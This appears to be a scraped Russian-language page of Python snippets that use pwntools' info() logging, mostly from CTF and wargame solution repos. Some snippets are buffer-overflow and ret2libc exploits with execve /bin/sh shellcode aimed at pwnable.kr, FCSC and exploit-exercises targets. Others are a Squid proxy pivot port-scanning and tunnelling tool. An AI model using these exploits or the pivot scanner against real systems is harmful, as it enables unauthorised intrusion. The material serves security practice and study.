Python info примеры использования

Пример #1

 def _start(self):
     for ip_addr in IPNetwork(self.range):
         print("")
         info("Scanning host {0} for port range {1}-{2}".format(
             ip_addr, self.start_port, self.end_port))
         for port in range(self.start_port, self.end_port):
             with semaphore:
                 thr = Thread(target=self._prod_port,
                              args=((ip_addr, port), ),
                              name="portscan_{0}".format(port))
                 thr.start()
                 write("Scanning port: {0}  \r".format(port))
     return None

Пример #2

def Exploit(fichier, pattern):
    regex = pattern
    file = fichier
    pwn.info("Opening file: {fichier}\n".format(fichier=file))
    s = pwn.read(file)
    pwn.info("Searching for pattern: {flag}\n".format(flag=regex))
    c = re.findall(regex, str(s))
    if not c:
        pwn.warn("No flag for you my friend, check your regex")
    else:
        for a in c:
            pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
            pwn.warn("flag is now copied in flag.txt")
            pwn.write("flag.txt", a)

Пример #3

def Online(url, pattern):
    regex = pattern
    file = url
    pwn.info("Opening file: {fichier}\n".format(fichier=file))
    r = requests.session()
    s = r.get(file)
    s = s.content
    pwn.info("Search for pattern: {flag}\n".format(flag=regex))
    c = re.findall(regex, str(s))
    if not c:
        pwn.warn("No flag for you my friend, check your regex")
    else:
        for a in c:
            pwn.success("Yeah !!!! flag found: {result}\n".format(result=a))
            pwn.warn("flag is now copied in flag.txt")
            pwn.write("flag.txt", a)

Пример #4

    def _create_tunnel(self):
        """
        Creates a TCP tunnel for a certain port using proxytunnel.
        """
        proc = Popen([
            "proxytunnel", "-p", ':'.join([
                self.proxy_addr, str(self.proxy_port)
            ]), '-d', ':'.join([self.host_addr, str(self.port)]), '-a',
            str(self.tunnel_port)
        ],
                     stdout=PIPE,
                     stderr=PIPE,
                     shell=False)

        if self._check_tunnel() is True:
            info("Tunneling established: {0}:{1} <---> {2}:{3} <---> you:{4}".
                 format(self.host_addr, self.port, self.proxy_addr,
                        self.proxy_port, self.tunnel_port))
            self.is_active = True
            self.pid = proc.pid
        else:
            info("Tunneling failed.")

Пример #5

 def _prod_port(self, conn_info):
     """
     param: (str, int) => (ip, port)
     """
     with semaphore:
         name = currentThread().getName()
         pool.makeActive(name)
         ip, port = conn_info
         if self.passwd is None:
             proc = Popen(
                 "curl --connect-timeout {0} -x '{1}:{2}' {3}:{4}".format(
                     DEFAULT_TIMEOUT, self.target_ip, self.target_port, ip,
                     port),
                 shell=True,
                 stdout=PIPE,
                 stderr=PIPE)
         else:
             proc = Popen(
                 "curl --connect-timeout {0} -x '{1}:{2}' {3}:{4} --proxy-user '{5}:{6}'"
                 .format(DEFAULT_TIMEOUT, self.target_ip, self.target_port,
                         ip, port, self.username, self.passwd),
                 shell=True,
                 stdout=PIPE,
                 stderr=PIPE)
         stdout, stderr = proc.communicate()
         for err in self.error_string.split(","):
             if err.lower() in stdout.lower():
                 pool.makeInactive(name)
                 return None
         info("Open port: {0}".format(port))
         self.open_ports.append(port)
         pool.makeInactive(name)
         if self.tunnel is True:
             tunnel = Tunnel((self.target_ip, self.target_port), (ip, port),
                             self.base_num)  # creates a TCP tunnel
             self.tunnels.append(tunnel)  # register the tunnel
     return port

Пример #6

def third_attempt(remote):
    length_before_return_address = 0x14
    write_address = 0x08048087
    payload = b'A' * length_before_return_address + pwn.p32(write_address)
    remote.send(payload)

    esp_bytes = 4
    bytes_to_receive = 0x14
    esp = pwn.u32(remote.recv(esp_bytes))
    pwn.info('ESP was %d' % esp)
    remote.recv(bytes_to_receive - esp_bytes)  # Not used

    # shellcode = pwn.asm(pwn.shellcraft.sh())  # too long, manually reduced below
    shellcode = pwn.asm(
    '''
        push 0x68
        push 0x732f2f2f
        push 0x6e69622f
        mov ebx, esp
        xor ecx, ecx
        xor edx, edx
        /* call execve() */
        push 11 /* 0xb */
        pop eax
        int 0x80
    ''')

    payload = b'A' * length_before_return_address + \
        pwn.p32(esp + length_before_return_address) + \
        shellcode

    assert len(payload) <= 60, len(payload)
    remote.send(payload)
    remote.sendline('cat /home/start/flag')
    pwn.success('Flag is: %s' % remote.recvuntil('\n').rstrip().decode('utf8'))
    remote.interactive()

Пример #7

 def close(self):
     """
     Kills an open TCP tunnel proccess.
     """
     if type(self.pid) is not int or self.pid < 1:
         info("Tunnel proccess pid is not set.  [{0}:{1}]".format(
             self.host_addr, self.port))
     info("Killing tunnel for {0}:{1}".format(self.host_addr, self.port))
     try:
         kill(self.pid, 9)
         return True
     except Exception as e:
         info("Could not kill tunnel proccess!")
         return None

Пример #8

    def callb(self, r):
        while True:
            client_input = r.recvrepeat(self.wait_for_response)
            if len(client_input) < 1:
                sleep(0.1)
                continue
            pwn.info("Recieved: " + pwn.hexdump(client_input))
            pk = HSZFPacket()
            pk.parse(client_input)
            if pk.identifier == Identifier.REQUEST:
                uds_data = pk.uds_packet.get_full_packet()
                if len(uds_data) < 1:
                    data = 0x00
                else:
                    data = unpack_all(uds_data)
                # ECU identifier
                if pk.reciever != 0x37 or pk.sender != 0x13:
                    response_data = self.sid_switch(0x33)(0x33, r, pk)
                else:
                    response_data = self.sid_switch(data)(data, r, pk)
                response = HSZFPacket()
                response.create(response_data, pk.reciever, pk.sender)
                pwn.info("Sending the response: " +
                         pwn.hexdump(response.get_full_packet()))
                r.send(response.get_full_packet())

                if data == 0x22F100:
                    pwn.info("--Got Session Request--\n" +
                             pwn.hexdump(pk.uds_packet.get_full_packet()))
                    response = HSZFPacket()
                    response.create(b'\x62\xF1\x00\x01\x81\x00\x01',
                                    pk.reciever, pk.sender)
                    pwn.info("Sending the response: " +
                             pwn.hexdump(response.get_full_packet()))
                    r.send(response.get_full_packet())

            r.clean_and_log()

Пример #9

The problem is that movdqa requires any memory address to be 16-byte aligned.
The solution below bruteforces each round by trying up to 16 different byte offsets.
"""

solution = [8, 16, 32]
solved_rounds = len(solution)
keep_running = True

while keep_running:
    solved_round = False
    for i in range(0, 16):
        with pwn.context.local(log_level='error'):
            io = pwn.remote('pwnable.kr', 9022)
        next_number_to_try = 2 ** (solved_rounds + 3) + i
        io.recvuntil('No fancy hacking, I promise :D\n')
        pwn.info("Round %d: Trying %d (+%d)" % (solved_rounds, next_number_to_try, i))
        for round in range(0, 10):
            if round < solved_rounds:
                io.sendline(str(solution[round]))
            elif round == solved_rounds:
                io.sendline(str(next_number_to_try))
            else:
                io.sendline(str(2 ** (round + 3)))
            io.recv()
        io.recvuntil('ok, lets run the experiment with your configuration\n')
        newlines_per_solved_round = 4
        with pwn.context.local(log_level='error'):
            results = io.recvall()
        lines = results.strip().split(b'\n')
        progress_to_round = int(len(lines) / newlines_per_solved_round) - 1

Пример #10

Файл: wrapper.py Проект: GANGE666/DataCon2020

def bound_handler(output_path):
    with open(output_path, "r") as output_file:
        data = output_file.read()
        info(data)
        return data

Пример #11

def binExtract(cible):  # {{{
    pwn.info("Extraction en cours de {}".format(cible))
    binwalk.scan(cible, signature=True, extract=True)

Пример #12

def binScan(cible):  # {{{
    pwn.info("Scan en cours de {}".format(cible))
    binwalk.scan(cible, signature=True, extract=False)

Пример #13

Файл: palindrome.py Проект: tiphergane/PalindromeChecker

def reverseString(a):  # {{{
    x = str(a)[::-1]
    pwn.info("nous testons le mot {}".format(a))
    testString(x, baseString)
    return  # }}}

Пример #14

Файл: bim.py Проект: amirr0r/FCSC2020

import pwn

remote = True

if remote:
    io = pwn.remote('challenges1.france-cybersecurity-challenge.fr', 4000)
else:
    io = pwn.process(elf.path)

pwn.context.log_level = 'debug'

elf = pwn.context.binary = pwn.ELF('poney')
offset = 40
shell = pwn.p64(elf.symbols.shell)
payload = "A" * offset + shell

pwn.info("Shell address: %#x ", elf.symbols.shell)
pwn.info("Little Endian shell address: %s ", shell)
pwn.info("Payload: %s ", payload)

io.sendline(payload)
io.interactive()
io.close()

Пример #15

import pwn

host = "192.168.1.251"
port = 2998

r = pwn.remote(host,port)

message = r.recv(1024)
number = int.from_bytes(message, byteorder='little', signed=False)

pwn.info(str(number))

r.sendline(str(number))

pwn.success(r.recvline().strip())

r.close()

Пример #16

        for ip_addr in IPNetwork(self.range):
            print("")
            info("Scanning host {0} for port range {1}-{2}".format(
                ip_addr, self.start_port, self.end_port))
            for port in range(self.start_port, self.end_port):
                with semaphore:
                    thr = Thread(target=self._prod_port,
                                 args=((ip_addr, port), ),
                                 name="portscan_{0}".format(port))
                    thr.start()
                    write("Scanning port: {0}  \r".format(port))
        return None


if __name__ == "__main__":
    info("ProxyPwn - zc00l super proxy pivot scanning/tunneling script")
    parser = ArgumentParser()
    parser.add_argument("--target", help="Squid IP:port", required=True)
    parser.add_argument("--range",
                        help="IP network range to scan.",
                        required=True)
    parser.add_argument("--error-string",
                        help="Error string",
                        type=str,
                        default="denied,fail")
    parser.add_argument("--port-range",
                        help="Port range to scan in format: X,Y",
                        type=str,
                        default="1,1024")
    parser.add_argument("--threads",
                        help="How many threads to use",

Пример #17

Файл: find.py Проект: avboy1337/two_gadget

import sys,json
from pwn import success,log,info

if len(sys.argv)!=3:
    log.critical("error") 
    info("Usage: python find.py file_in_db 'reg1(&|)reg2'") 
    info("we will find out reg1 and(or) reg2 == 0 for you") 
    info("Example: python find.py libc 'rax&rbx'")
    exit(0)

filename="./db/"+sys.argv[1]
inputbuf=sys.argv[2]
check=0
if '&' in inputbuf:
    check=1
    regs=inputbuf.replace("&"," ").split()
else:
    regs=inputbuf.replace("|"," ").split()

fp=open(filename,"r")
while True:
    tmp=fp.readline()
    if not tmp or tmp=='\n':
        break
    res=json.loads(tmp[:-1])
    if check:
        if res.get(regs[0])==0 and res.get(regs[1])==0:
            printbuf=''
            for i,j in res.items():
                printbuf+=i+":"+hex(j)+"  "
            printbuf+="\n"

Пример #18

Файл: net0_solution.py Проект: amirr0r/exploit-exercises

import pwn

host = "192.168.1.251"
port = 2999

r = pwn.remote(host, port)

message = r.recvline().strip()
number = int(message.decode().split("'")[1])

pwn.info(message)

r.sendline(pwn.p32(number))

pwn.success(r.recvline().strip())

r.close()

Пример #19

Файл: final0_solution_ret2libc.py Проект: amirr0r/exploit-exercises

import pwn

host = "192.168.1.251"
port = 2995

r = pwn.remote(host, port)

offset = 531
junk = b"\x00" + b"A" * offset

libc_addr = 0xb7e97000  # cat /proc/$(pidof final0)/maps
system_addr = libc_addr + 0x00038fb0  # readelf -s /lib/libc-2.11.2.so | grep -i system
exit_addr = libc_addr + 0x0002f0c0  # readelf -s /lib/libc-2.11.2.so | grep -i exit
bin_sh = libc_addr + 0x11f3bf  # strings -atx /lib/libc-2.11.2.so | grep "/bin/sh"

pwn.info("system address: 0x%x" % system_addr)
pwn.info("exit address: 0x%x" % exit_addr)
pwn.info("/bin/sh address: 0x%x" % bin_sh)

payload = junk + pwn.p32(system_addr) + pwn.p32(exit_addr) + pwn.p32(bin_sh)

r.sendline(payload)
r.interactive()
r.close()